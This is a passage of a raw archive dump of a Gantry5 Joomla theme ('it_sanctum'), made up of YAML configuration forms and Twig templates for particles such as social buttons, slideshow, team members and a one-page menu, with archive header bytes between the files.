          label: Tooltip Text

        _note6:
          type: separator.note
          class: alert alert-info
          content: '<i class="fa fa-angle-down"></i> Additional Options'

        .class:
          type: input.selectize
          label: CSS Class

        .extra:
          type: collection.keyvalue
          label: Tag Attributes
          description: Extra Tag attributes.
          key_placeholder: Key (data-*, style, ...)
          value_placeholder: Value
          exclude: ['id', 'class']PK!&�´AA it_sanctum/particles/social.yamlnu&1i�name: Social
description: Display social buttons.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable social particles.
      default: true

    title:
      type: input.text
      label: Title
      description: Customize the title text.
      placeholder: Enter title

    target:
      type: select.select
      label: Target
      description: Target browser window when item is clicked.
      placeholder: 'Select...'
      default: _blank
      options:
          _parent: Self
          _blank: New Window

    tooltippos:
      type: select.select
      label: Tooltip Position
      description: Select the tooltip position.
      placeholder: 'Select...'
      default: auto
      options:
        auto: Auto
        top: Top
        bottom: Bottom

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    items:
      type: collection.list
      array: true
      label: Social Items
      description: Create each social item to display.
      value: name
      ajax: true

      fields:

        .name:
          type: input.text
          label: Name
          skip: true

        .icon:
          type: input.icon
          label: Icon

        .text:
          type: input.text
          label: Text

        .link:
          type: input.text
          label: Link

        .tooltip:
          type: input.text
          label: Tooltip Text

        .class:
          type: input.selectize
          label: CSS Class

        .extra:
          type: collection.keyvalue
          label: Tag Attributes
          description: Extra Tag attributes.
          key_placeholder: Key (data-*, style, ...)
          value_placeholder: Value
          exclude: ['id', 'class']
PK!Ͼ#6��)it_sanctum/particles/icon-fonts.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% block stylesheets %}
    {% if particle.enabled %}
        {{ parent() }}
        {% if particle.load.octicons %}
            <link rel="stylesheet" href="{{ url('gantry-theme://fonts/octicons/octicons.css') }}" type="text/css"/>
        {% endif %}
        {% if particle.load.strokeicon7 %}
            <link rel="stylesheet" href="{{ url('gantry-theme://fonts/pe-icon-7-stroke/css/pe-icon-7-stroke.css') }}" type="text/css"/>
            <link rel="stylesheet" href="{{ url('gantry-theme://fonts/pe-icon-7-stroke/css/helper.css') }}" type="text/css"/>
        {% endif %}
        {% if particle.load.ionicons %}
            <link rel="stylesheet" href="{{ url('gantry-theme://fonts/ionicons/css/ionicons.min.css') }}" type="text/css"/>
        {% endif %}
        {% if particle.load.themify %}
            <link rel="stylesheet" href="{{ url('gantry-theme://fonts/themify-icons/themify-icons.css') }}" type="text/css"/>
        {% endif %}
        {% if particle.load.typicons %}
            <link rel="stylesheet" href="{{ url('gantry-theme://fonts/typicons/typicons.min.css') }}" type="text/css"/>
        {% endif %}
        {% if particle.load.medical %}
            <link rel="stylesheet" href="{{ url('gantry-theme://fonts/webfont-medical-icons/css/wfmi-style.css') }}" type="text/css"/>
        {% endif %}
    {% endif %}
{% endblock %}


PK!DV�T��%it_sanctum/particles/social.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% block particle %}
	{% if particle.title %}<h2 class="g-title">{{ particle.title|raw }}</h2>{% endif %}
    <div class="g-social{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
        {% for item in particle.items %}
            {% set attr_extra_item = '' %}
            {% for extra in item.extra %}
                {% set attr_extra_item = attr_extra_item ~ ' ' ~ extra|keys|first|e ~ '="' ~ extra|values|first|e('html_attr') ~ '"' %}
            {% endfor %}
            <a target="{{ particle.target|default('_blank')|e }}" href="{{ item.link|e }}" {% if item.tooltip %}data-uk-tooltip{% if particle.tooltippos|default('auto') == 'bottom' %}="{pos:'bottom'}"{% endif %}{% if particle.tooltippos|default('auto') == 'top' %}="{pos:'top'}"{% endif %} title="{{ item.tooltip|e }}"{% endif %} {% if item.tooltip == false %}title="{{ item.text|e }}"{% endif %} {% if item.class %}class="{{ item.class|e }}"{% endif %} {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}{% if item.text %} aria-label="{{ item.text|e }}"{% else %} aria-label="{{ item.tooltip|e }}"{% endif %}>
                <span class="{{ item.icon|e }}"></span>
                {% if item.text %}<span class="g-social-text">{{ item.text|e }}</span>{% endif %}
            </a>
        {% endfor %}
    </div>
{% endblock %}
PK!
�`L��&it_sanctum/particles/main-feature.yamlnu&1i�name: Main Feature
description: Display a main feature.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable main feature particles.
      default: true

    layout:
      type: select.select
      label: Layout
      description: Select the layout for this particle.
      placeholder: 'Select...'
      default: right
      options:
        right: Image on the right
        left: Image on the left

    image:
      type: input.imagepicker
      label: Image
      description: Select an image.

    alt:
      type: input.text
      label: Image Alt Tag
      description: Type in the image alt tag.
      placeholder: Enter alt tag

    imagewidth:
      type: input.text
      label: Image Width
      description: Type in the width of the image block in percentage. It must be a digit between 0 and 100. The default is '50'.
      default: 50

    imagebottom:
      type: select.select
      label: Image at the bottom
      description: Set the image at the bottom of the section. Recommended for an image of a person.
      placeholder: 'Select...'
      default: yes
      options:
        yes: Yes
        no: No

    title:
      type: input.text
      label: Title
      description: Type in the title text.
      placeholder: Enter title

    description:
      type: textarea.textarea
      label: Description
      description: Type in the description text.
      placeholder: Enter description

    link:
      type: input.text
      label: Button 1 Link
      description: Type in the URL.

    buttontext:
      type: input.text
      label: Button 1 Text
      description: Type in the button text.

    buttonicon:
      type: input.icon
      label: Button 1 Icon
      description: Select an icon for the button.

    target:
      type: select.select
      label: Button 1 Target
      description: Target browser window when item is clicked.
      placeholder: 'Select...'
      default: _parent
      options:
          _parent: Self
          _blank: New Window

    link2:
      type: input.text
      label: Button 2 Link
      description: Type in the URL.

    buttontext2:
      type: input.text
      label: Button 2 Text
      description: Type in the button text.

    buttonicon2:
      type: input.icon
      label: Button 2 Icon
      description: Select an icon for the button.

    target2:
      type: select.select
      label: Button 2 Target
      description: Target browser window when item is clicked.
      placeholder: 'Select...'
      default: _parent
      options:
          _parent: Self
          _blank: New Window

    css.class:
      type: input.selectize
      label: General CSS Classes
      description: CSS class name for the whole particle.
      default: 

    css.left:
      type: input.selectize
      label: Left CSS Classes
      description: CSS class name for the left element.
      default:

    css.right:
      type: input.selectize
      label: Right CSS Classes
      description: CSS class name for the right element.
      default:

    extra:
      type: collection.keyvalue
      label: General Tag Attributes
      description: Extra Tag attributes for the whole particle.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    extra_left:
      type: collection.keyvalue
      label: Left Tag Attributes
      description: Extra Tag attributes for the left element.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    extra_right:
      type: collection.keyvalue
      label: Right Tag Attributes
      description: Extra Tag attributes for the right element.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']
PK!n=�!+it_sanctum/particles/onepage-menu.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% block particle %}
    
    <div class="g-onepage-menu{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
        <ul data-uk-scrollspy-nav="{closest:'li', smoothscroll: {offset: {{ particle.smoothscrolloffset|e }}}}" data-uk-sticky="{media:768, top:{{ particle.stickyoffset|e }}, boundary: '{{ particle.boundary|e }}'}">
        {% for item in particle.items %}
        	{% set attr_extra_item = '' %}
			{% for extra in item.extra %}
				{% set attr_extra_item = attr_extra_item ~ ' ' ~ extra|keys|first|e ~ '="' ~ extra|values|first|e('html_attr') ~ '"' %}
			{% endfor %}
        	<li class="g-onepage-menu-item{% if item.class %} {{ item.class|e }}{% endif %}" {% if item.extra %}{{ attr_extra_item|raw }}{% endif %}>
                <a href="{% if item.link %}#{{ item.link|e }}{% endif %}">
                    {%- if item.icon -%}
                        <i class="{{ item.icon|e }}"></i>
                    {%- endif -%}
                    {{- item.title|raw -}}
                </a>
                {% if item.subtitle1 or item.subtitle2 or item.subtitle3 or item.subtitle4 or item.subtitle5 %}
                    <ul class="submenu">
                        {% if item.subtitle1 %}
                            <li>
                                <a href="{% if item.sublink1 %}#{{ item.sublink1|e }}{% endif %}">
                                    {%- if item.subicon1 -%}
                                        <i class="{{ item.subicon1|e }}"></i>
                                    {%- endif -%}
                                    {{- item.subtitle1|raw -}}
                                </a>
                            </li>
                        {% endif %}

                        {% if item.subtitle2 %}
                            <li>
                                <a href="{% if item.sublink2 %}#{{ item.sublink2|e }}{% endif %}">
                                    {%- if item.subicon2 -%}
                                        <i class="{{ item.subicon2|e }}"></i>
                                    {%- endif -%}
                                    {{- item.subtitle2|raw -}}
                                </a>
                            </li>
                        {% endif %}

                        {% if item.subtitle3 %}
                            <li>
                                <a href="{% if item.sublink3 %}#{{ item.sublink3|e }}{% endif %}">
                                    {%- if item.subicon3 -%}
                                        <i class="{{ item.subicon3|e }}"></i>
                                    {%- endif -%}
                                    {{- item.subtitle3|raw -}}
                                </a>
                            </li>
                        {% endif %}

                        {% if item.subtitle4 %}
                            <li>
                                <a href="{% if item.sublink4 %}#{{ item.sublink4|e }}{% endif %}">
                                    {%- if item.subicon4 -%}
                                        <i class="{{ item.subicon4|e }}"></i>
                                    {%- endif -%}
                                    {{- item.subtitle4|raw -}}
                                </a>
                            </li>
                        {% endif %}

                        {% if item.subtitle5 %}
                            <li>
                                <a href="{% if item.sublink5 %}#{{ item.sublink5|e }}{% endif %}">
                                    {%- if item.subicon5 -%}
                                        <i class="{{ item.subicon5|e }}"></i>
                                    {%- endif -%}
                                    {{- item.subtitle5|raw -}}
                                </a>
                            </li>
                        {% endif %}
                    </ul>
                {% endif %}
            </li>
        {% endfor %}
        </ul>
    </div>
{% endblock %}

{% block javascript_footer %}
    {{ parent() }}
    <script type="text/javascript">
        (function($) {
            $(document).ready(function() {
                if( $('.g-onepage-menu .submenu').length ) {
                    // select the target node
                    var onepageMenu = document.querySelector('.g-onepage-menu');
                     
                    // create an observer instance
                    var observer = new MutationObserver(function(mutations) {
                        mutations.forEach(function(mutation) {
                            $('.g-onepage-menu .submenu li').each(function() {
                                if( $(this).hasClass('uk-active') ) {
                                    $(this).parent('.submenu').addClass('uk-active');
                                }
                            });

                            $('.g-onepage-menu .submenu').each(function() {
                                if( !$(this).children().hasClass('uk-active') ) {
                                    $(this).removeClass('uk-active');
                                }
                            });
                        });
                    });
                     
                    // configuration of the observer:
                    var config = { attributes: true, childList: true, characterData: true, subtree: true }
                     
                    // pass in the target node, as well as the observer options
                    observer.observe(onepageMenu, config);
                }
            });
        })(jQuery);
    </script>
{% endblock %}PK!7Gy�aa/it_sanctum/particles/offcanvas-toggle.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% block stylesheets %}
	{% if particle.enabled %}
		{{ parent() }}
		<style type="text/css">
			@media (min-width: {{ gantry.config.get('styles.breakpoints.mobile-menu-breakpoint')|default('48rem') }}) {
				.g-offcanvas-toggle {
					display: none;
				}
			}
		</style>
	{% endif %}
{% endblock %}

{% block particle %}

	<div class="offcanvas-toggle-particle g-offcanvas-toggle" data-offcanvas-toggle="" aria-label="{{'Offcanvas'|trans_key('IT_ACCESS_OFFCANVAS')}}">
		<i class="{{ particle.icon|e }}"></i>
	</div>

{% endblock %}PK!q����"it_sanctum/particles/our-team.yamlnu&1i�name: Our Team
description: Display team members.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Our Team particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: '<strong>This Particle requires the "UIkit for Gantry5" Atom to be loaded.</strong>'

    mainheading:
      type: input.text
      label: Title
      description: Type in the title.
      placeholder: 'Enter Title'
      default: ''

    introtext:
      type: textarea.textarea
      label: Intro Text
      description: Type in the intro text.
      placeholder: 'Enter Intro Text'
      default: ''

    style:
      type: select.select
      label: Style
      description: Select the style which defines the particle layout on the frontend.
      placeholder: 'Select...'
      default: style1
      options:
        style1: Style 1
        style2: Style 2
        style3: Style 3

    behaviour:
      type: select.select
      label: Behaviour
      description: Select the particle behaviour - static, slider or slideset.
      placeholder: 'Select...'
      default: static
      options:
        static: Static
        slider: Slider
        slideset: Slideset

    columns:
      type: select.select
      label: Items per Slide
      description: Select the number of items per slide for the Slider and Slideset behaviour. This option also acts as 'Items per Row' for the 'Static' behavior.
      placeholder: 'Select...'
      default: 3
      options:
        1: 1
        2: 2
        3: 3
        4: 4
        5: 5
        6: 6
        10: 10

    gutter:
      type: select.select
      label: Gutter
      description: Enable or disable the Our Team gutter (to have space between the items or not).
      placeholder: 'Select...'
      default: enabled
      options:
        enabled: Enabled
        disabled: Disabled

    autoplay:
      type: select.select
      label: Autoplay
      description: Select whether or not the Slider and Slideset items should switch automatically
      placeholder: 'Select...'
      default: disable
      options:
        enable: Enabled
        disable: Disabled

    navigation:
      type: select.select
      label: Navigation
      description: Select the navigation type (Slideset ONLY).
      placeholder: 'Select...'
      default: arrows
      options:
        arrows: Arrows
        dots: Dots
        both: Both

    animation:
      type: select.select
      label: Animation
      description: Select the animation type (Slideset ONLY).
      placeholder: 'Select...'
      default: fade
      options:
        fade: Fade
        scale: Scale
        slide-horizontal: Slide-horizontal
        slide-vertical: Slide-vertical
        slide-top: Slide-top
        slide-bottom: Slide-bottom

    duration:
      type: input.text
      label: Animation Duration
      description: Set the animation duration in miliseconds (Slideset ONLY).
      default: 200

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default:

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    items:
      type: collection.list
      array: true
      label: Our Team Items
      description: Create each team member item to display.
      value: name
      ajax: true

      fields:

        .image:
          type: input.imagepicker
          label: Image

        .alt:
          type: input.text
          label: Image Alt Tag

        .membername:
          type: input.text
          label: Name

        .link:
          type: input.text
          label: Name Link

        .nametarget:
          type: select.select
          label: Name Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _parent
          options:
            _parent: Self
            _blank: New Window

        .position:
          type: input.text
          label: Position

        .description:
          type: textarea.textarea
          label: Description

        .facebook:
          type: input.text
          label: Facebook URL

        .twitter:
          type: input.text
          label: Twitter URL

        .googleplus:
          type: input.text
          label: Google+ URL

        .linkedin:
          type: input.text
          label: Linkedin URL

        .dribbble:
          type: input.text
          label: Dribbble URL

        .email:
          type: input.text
          label: Email Address

        .emailbehaviour:
          type: select.select
          label: Email Behaviour
          description: Select the email behaviour (if it should be a 'mailto:' link or a tooltip).
          placeholder: 'Select...'
          default: link
          options:
            link: Link
            tooltip: Tooltip

        .phone:
          type: input.text
          label: Phone Number

        .phonebehaviour:
          type: select.select
          label: Phone Behaviour
          description: Select the phone behaviour (if it should be a 'tel:' link or a tooltip).
          placeholder: 'Select...'
          default: link
          options:
            link: Link
            tooltip: Tooltip

        .socialtarget:
          type: select.select
          label: Social Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _blank
          options:
            _parent: Self
            _blank: New Window

        .class:
          type: input.selectize
          label: CSS Class

        .extra:
          type: collection.keyvalue
          label: Tag Attributes
          description: Extra Tag attributes.
          key_placeholder: Key (data-*, style, ...)
          value_placeholder: Value
          exclude: ['id', 'class']PK!���'S3S3,it_sanctum/particles/content-pro-joomla.yamlnu&1i�name: Content PRO (Joomla)
description: Display Joomla articles in an awesome way.
type: particle

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Content PRO (Joomla) particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: '<strong>This Particle requires the "UIkit for Gantry5" Atom to be loaded.</strong>'

    _tabs:
      type: container.tabs
      fields:
        _tab_main:
          label: Main Settings
          fields:
            mainheading:
              type: input.text
              label: Title
              description: Type in the title.
              placeholder: 'Enter Title'
              default: ''

            introtext:
              type: textarea.textarea
              label: Intro Text
              description: Type in the intro text.
              placeholder: 'Enter Intro Text'
              default: ''

            style:
              type: select.select
              label: Style
              description: Select the style which defines the particle layout on the frontend.
              placeholder: 'Select...'
              default: style1
              options:
                style1: Style 1
                style2: Style 2
                style3: Style 3

            behaviour:
              type: select.select
              label: Behaviour
              description: Select the particle behaviour - static, slider or slideset.
              placeholder: 'Select...'
              default: static
              options:
                static: Static
                slider: Slider
                slideset: Slideset

            columns:
              type: select.select
              label: Items per Slide
              description: Select the number of items per slide for the Slider and Slideset behaviour. This option also acts as 'Items per Row' for the 'Static' behavior.
              placeholder: 'Select...'
              default: 3
              options:
                1: 1
                2: 2
                3: 3
                4: 4
                5: 5
                6: 6
                10: 10

            gutter:
              type: select.select
              label: Gutter
              description: Enable or disable the Content PRO gutter (to have space between the items or not).
              placeholder: 'Select...'
              default: enabled
              options:
                enabled: Enabled
                disabled: Disabled

            autoplay:
              type: select.select
              label: Autoplay
              description: Select whether or not the Slider and Slideset items should switch automatically
              placeholder: 'Select...'
              default: disable
              options:
                enable: Enabled
                disable: Disabled

            autoplayInterval:
              type: input.text
              label: Autoplay Interval
              description: Set the timespan in miliseconds between switching the slides/pages.
              default: 7000

            navigation:
              type: select.select
              label: Navigation
              description: Select the navigation type (Slideset ONLY).
              placeholder: 'Select...'
              default: arrows
              options:
                arrows: Arrows
                dots: Dots
                both: Both

            animation:
              type: select.select
              label: Animation
              description: Select the animation type (Slideset ONLY).
              placeholder: 'Select...'
              default: fade
              options:
                fade: Fade
                scale: Scale
                slide-horizontal: Slide-horizontal
                slide-vertical: Slide-vertical
                slide-top: Slide-top
                slide-bottom: Slide-bottom

            duration:
              type: input.text
              label: Animation Duration
              description: Set the animation duration in miliseconds (Slideset ONLY).
              default: 200

            lightbox:
              type: select.select
              label: Lightbox
              description: Enable or disable the image lightbox/popup.
              placeholder: 'Select...'
              default: enable
              options:
                enable: Enabled
                disable: Disabled
                disablelink: Disabled (Article Link)

            pullup:
              type: input.checkbox
              label: Pull Up
              description: If enabled, a negative 'margin-top' will be applied to the particle. Enabling this option is recommended only when the particle is just below the slider.
              default: 0

            css.class:
              type: input.selectize
              label: CSS Classes
              description: CSS class name for the particle.
              default:

            extra:
              type: collection.keyvalue
              label: Tag Attributes
              description: Extra Tag attributes.
              key_placeholder: Key (data-*, style, ...)
              value_placeholder: Value
              exclude: ['id', 'class']

        _tab_source:
          label: Data Source
          fields:
            article.filter.categories:
              type: joomla.categories
              label: Categories
              description: Select the categories the articles should be taken from.
              overridable: false

            article.filter.articles:
              type: input.text
              label: Articles
              description: Enter the Joomla articles that should be shown. It should be a list of article IDs separated with a comma (i.e. 1,2,3,4,5).
              overridable: false

            article.filter.featured:
              type: select.select
              label: Featured Articles
              description: Select how Featured articles should be filtered.
              default: ''
              options:
                include: Include Featured
                exclude: Exclude Featured
                only: Only Featured
              overridable: false

            article.limit.total:
              type: input.text
              label: Number of Articles
              description: Enter the maximum number of articles to display.
              default: 3
              pattern: '\d{1,2}'
              overridable: false

            article.limit.start:
              type: input.text
              label: Start From
              description: Enter offset specifying the first article to return. The default is '0' (the first article).
              default: 0
              pattern: '\d{1,2}'
              overridable: false

            article.sort.orderby:
              type: select.select
              label: Order By
              description: Select how the articles should be ordered by.
              default: publish_up
              options:
                publish_up: Published Date
                created: Created Date
                modified: Last Modified Date
                title: Title
                ordering: Ordering
                hits: Hits
                id: ID
                alias: Alias
              overridable: false

            article.sort.ordering:
              type: select.select
              label: Ordering Direction
              description: Select the direction the articles should be ordered by.
              default: ASC
              options:
                ASC: Ascending
                DESC: Descending
              overridable: false

        _tab_layout:
          label: Article Layout
          fields:
            article.display.image.enabled:
              type: select.select
              label: Image
              description: Select if and what image of the article should be shown.
              default: intro
              options:
                intro: Intro
                full: Full
                '': None

            height:
              type: input.text
              label: Image Height
              description: Set the image height in pixels (do NOT type in 'px', enter just the digits). If you leave this field empty the default image proportions will be used.
              pattern: '\d{1,4}'

            article.display.title.enabled:
              type: select.select
              label: Title
              description: Select if the article title should be shown.
              default: show
              options:
                show: Show (Article Link)
                shownolink: Show (No Link)
                '': Hide

            article.display.title.limit:
              type: input.text
              label: Title Limit
              description: Enter the maximum number of characters the article title should be limited to.
              pattern: '\d+(\.\d+){0,1}'

            articledetails:
              type: select.select
              label: Article Details
              description: Select if the article details should be shown (Date, Author, Category, Hits).
              default: show
              options:
                show: Show (Top)
                showbottom: Show (Bottom)
                hide: Hide

            article.display.date.enabled:
              type: select.select
              label: Date
              description: Select if the article date should be shown.
              default: published
              options:
                created: Show Created Date
                published: Show Published Date
                modified: Show Modified Date
                '': Hide

            article.display.date.format:
              type: select.date
              label: Date Format
              description: Select the preferred date format.
              default: l, F d, Y
              selectize:
                  allowEmptyOption: true
              options:
                  'l, F d, Y': Date1
                  'l, d F': Date2
                  'D, d F': Date3
                  'F d': Date4
                  'd F': Date5
                  'd M': Date6
                  'D, M d, Y': Date7
                  'D, M d, y': Date8
                  'l': Date9
                  'l j F Y': Date10
                  'j F Y': Date11

            article.display.author.enabled:
              type: select.select
              label: Author
              description: Select if the article author should be shown.
              default: show
              options:
                show: Show (Author)
                showalias: Show (Alias)
                '': Hide

            article.display.category.enabled:
              type: select.select
              label: Category
              description: Select if and how the article category should be shown.
              default: link
              options:
                show: Show
                link: Show with Link
                '': Hide

            article.display.hits.enabled:
              type: select.select
              label: Hits
              description: Select if the article hits should be shown.
              default: show
              options:
                show: Show
                '': Hide

            article.display.text.type:
              type: select.select
              label: Article Text
              description: Select if and how the article text should be shown.
              default: intro
              options:
                intro: Introduction
                full: Full Article
                '': Hide

            article.display.text.limit:
              type: input.text
              label: Text Limit
              description: Type in the number of characters the article text should be limited to.
              default: ''
              pattern: '\d+'

            article.display.text.formatting:
              type: select.select
              label: Text Formatting
              description: Select the formatting you want to use to display the article text.
              default: text
              options:
                text: Plain Text
                html: HTML

            article.display.read_more.enabled:
              type: select.select
              label: Read More
              description: Select if the article 'Read More' button should be shown.
              default: show
              options:
                show: Show
                '': Hide

            article.display.read_more.label:
              type: input.text
              label: Read More Label
              description: Type in the label for the 'Read More' button.
              placeholder: 'Read More...'PK!!�]HHit_sanctum/particles/totop.yamlnu&1i�name: To Top
description: Scroll back to top.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: checkbox
      label: Enabled
      description: Globally enable to top particles.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: '<strong>This Particle requires the "UIkit for Gantry5" Atom to be loaded.</strong>'

    style:
      type: select.select
      label: Style
      description: Select the style which defines the particle layout on the frontend.
      placeholder: 'Select...'
      default: style1
      options:
        style1: Style 1
        style2: Style 2

    icon:
      type: input.icon
      label: Icon
      description: A Font Awesome icon to be displayed for the link.
      default: 'fa fa-angle-up'

    offset:
      type: input.text
      label: Offset
      description: Enter the top offset in pixels (do NOT type in 'px', enter just the digits). This value defines when the button will appear (after scrolling the specified number of pixels).

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.

    content:
      type: input.text
      label: Text
      description: The text to be displayed for the link. HTML is allowed.
      placeholder: 
PK!
@x$!$!#it_sanctum/particles/slideshow.yamlnu&1i�name: Slideshow
description: Display slideshow.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable slideshow particle.
      default: true

    _note:
      type: separator.note
      class: alert alert-info
      content: '<strong>This Particle requires the "UIkit for Gantry5" Atom to be loaded.</strong>'

    mainheading:
      type: input.text
      label: Title
      description: Type in the title.
      placeholder: 'Enter Title'
      default: ''

    introtext:
      type: textarea.textarea
      label: Intro Text
      description: Type in the intro text.
      placeholder: 'Enter Intro Text'
      default: ''

    height:
      type: input.text
      label: Slideshow Height
      description: Set the slideshow height in pixels (do NOT type in 'px', enter just the digits). Default is 'auto'.
      default: auto

    autoplay:
      type: select.select
      label: Autoplay
      description: Enable or disable the Slideshow autoplay.
      placeholder: 'Select...'
      default: "true"
      options:
        "true": Enabled
        "false": Disabled

    autoplayInterval:
      type: input.text
      label: Autoplay Interval
      description: Set the timespan in miliseconds between switching slideshow items.
      default: 7000

    navigation:
      type: select.select
      label: Navigation
      description: Select the Slideshow navigation.
      placeholder: 'Select...'
      default: arrows
      options:
        arrows: Arrows (Show on Hover)
        arrowsvisible: Arrows (Always Visible)
        dots: Dots
        both: Both (Show on Hover)
        bothvisible: Both (Always Visible)
        none: None

    animation:
      type: select.select
      label: Animation
      description: Select the Slideshow animation.
      placeholder: 'Select...'
      default: fade
      options:
        fade: Fade
        scroll: Scroll
        scale: Scale
        swipe: Swipe
        slice-down: Slice-down
        slice-up: Slice-up
        slice-up-down: Slice-up-down
        fold: Fold
        puzzle: Puzzle
        boxes: Boxes
        boxes-reverse: Boxed-reverse
        random-fx: Random

    animationDuration:
      type: input.text
      label: Animation Duration
      description: Set the animation duration in miliseconds.
      default: 500

    kenburns:
      type: select.select
      label: Ken Burns Effect
      description: Enable or disable the Ken Burns effect.
      placeholder: 'Select...'
      default: "false"
      options:
        "true": Enabled
        "false": Disabled

    pauseOnHover:
      type: select.select
      label: Pause on Hover
      description: Pause autoplay when hovering the slideshow.
      placeholder: 'Select...'
      default: "true"
      options:
        "true": Enabled
        "false": Disabled

    fullscreen:
      type: input.checkbox
      label: Fullscreen
      description: Make the Slideshow fullscreen that stretches to fill the entire viewport.
      default: 0

    css.class:
      type: input.selectize
      label: CSS Classes
      description: CSS class name for the particle.
      default: 

    extra:
      type: collection.keyvalue
      label: Tag Attributes
      description: Extra Tag attributes.
      key_placeholder: Key (data-*, style, ...)
      value_placeholder: Value
      exclude: ['id', 'class']

    items:
      type: collection.list
      array: true
      label: Slideshow Items
      description: Create each slideshow item to display.
      value: name
      ajax: true

      fields:

        .image:
          type: input.imagepicker
          label: Image
          description: Select an image for the slide.

        .videoiframe:
          type: textarea.textarea
          label: Video
          description: Paste the whole embed video iframe code (including the iframe tags) and modify it as needed.

        .alt:
          type: input.text
          label: Image Alt Tag

        .title:
          type: input.text
          label: Title

        .link:
          type: input.text
          label: Title Link

        .target:
          type: select.select
          label: Target
          description: Target browser window when item is clicked.
          placeholder: 'Select...'
          default: _parent
          options:
            _parent: Self
            _blank: New Window

        .description:
          type: textarea.textarea
          label: Description

        .buttons:
          type: collection.list
          array: true
          label: Buttons
          description: Create each button to display.
          value: name
          ajax: true

          fields:

            .text:
              type: input.text
              label: Button Text
              description: Type in the button text.

            .buttonicon:
              type: input.icon
              label: Button Icon
              description: Select an icon for the button.

            .buttonstyle:
              type: select.select
              label: Button Style
              description: Select the button style.
              placeholder: 'Select...'
              default: empty-light
              options:
                standard: Standard
                empty: Empty

            .link:
              type: input.text
              label: Button Link
              description: Type in the URL.

            .target:
              type: select.select
              label: Target
              description: Target browser window when item is clicked.
              placeholder: 'Select...'
              default: _parent
              options:
                _parent: Self
                _blank: New Window

        .overlaystyle:
          type: select.select
          label: Overlay Style
          description: Select the overlay style (Title and Description).
          placeholder: 'Select...'
          default: style1
          options:
            style1: Style 1
            style2: Style 2
            style3: Style 3

        .overlaycontainer:
          type: select.select
          label: Overlay Container
          description: Enable or disable the Overlay Container. It is a very handy option especially for Fullwidth Slideshows.
          placeholder: 'Select...'
          default: 0
          options:
            1: Enabled
            0: Disabled

        .overlayposition:
          type: select.select
          label: Overlay Position
          description: Select the overlay position (Title and Description).
          placeholder: 'Select...'
          default: bottom
          options:
            bottom: Bottom
            left: Left
            right: Right
            top: Top
            bottom-left: Bottom Left
            bottom-center: Bottom Center
            bottom-right: Bottom Right
            middle-left: Middle Left
            middle-center: Middle Center
            middle-right: Middle Right
            top-left: Top Left
            top-center: Top Center
            top-right: Top Right

        .overlayanimation:
          type: select.select
          label: Overlay Animation
          description: Select the overlay animation.
          placeholder: 'Select...'
          default: fade
          options:
            fade: Fade
            slide-left: Slide Left
            slide-left-short: Slide Left (Short)
            slide-right: Slide Right
            slide-right-short: Slide Right (Short)
            slide-top: Slide Top
            slide-top-short: Slide Top (Short)
            slide-bottom: Slide Bottom
            slide-bottom-short: Slide Bottom (Short)
            scale: Scale

        .overlaywidth:
          type: select.select
          label: Overlay Width
          description: Select the overlay width.
          placeholder: 'Select...'
          default: auto
          options:
            auto: Auto
            1: 100%
            2: 50%
            3: 33.3%
            4: 25%
            5: 20%
            6: 16.6%

        .class:
          type: input.selectize
          label: CSS ClassPK!CR@���#it_sanctum/particles/googlemap.yamlnu&1i�name: Google Map
description: Display a Google Map.
type: particle

configuration:
  caching:
    type: static

form:
  fields:
    enabled:
      type: input.checkbox
      label: Enabled
      description: Globally enable Google Map particles.
      default: true

    apikey:
      type: input.text
      label: Google Map API Key
      description: If you are using the Google Maps API on localhost or your domain was not active prior to June 22nd 2016, the Map will require a key in order to work.

    width:
      type: input.text
      label: Map Width
      description: Set the map width in pixels or percentage. Default is '100%'.
      default: 100%

    height:
      type: input.text
      label: Map Height
      description: Set the map height in pixels. Default is '500px'.
      default: 500px

    maptype:
      type: select.select
      label: Map Type
